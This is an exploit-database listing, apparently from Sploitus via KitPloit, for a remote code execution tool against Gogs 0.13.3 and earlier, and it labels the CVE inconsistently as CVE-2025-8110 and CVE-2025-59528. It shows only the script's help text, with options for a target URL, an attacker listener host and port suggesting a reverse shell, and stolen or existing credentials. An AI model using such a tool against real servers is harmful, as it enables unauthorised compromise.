Sploitus

Exploit for CVE-2025-8110 CVE-2025-59528 CVE-2025-8110

kitploit · 2026-08-28

Exploit Code

MARKDOWN21 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0DGT-CVE-2025-8110
# RCE - CVE-2025-59528 Gogs <= 0.13.3 Exploitation

root@kitploit:~
    
    
    $ python3 CVE-2025-8110.py -h
    usage: CVE-2025-8110.py [-h] -u URL -lh HOST -lp PORT [-user USERNAME] [-pass PASSWORD] [-x]
    
    CVE-2025-8110 Gogs Exploit
    
    options:
      -h, --help            show this help message and exit
      -u, --url URL         Gogs base URL (e.g., http://127.0.0.1:3000)
      -lh, --host HOST      Attacker listener host
      -lp, --port PORT      Attacker listener port
      -user, --username USERNAME
                            Existing Gogs username
      -pass, --password PASSWORD
                            Existing Gogs password
      -x, --proxy           Use local proxy (localhost:8080)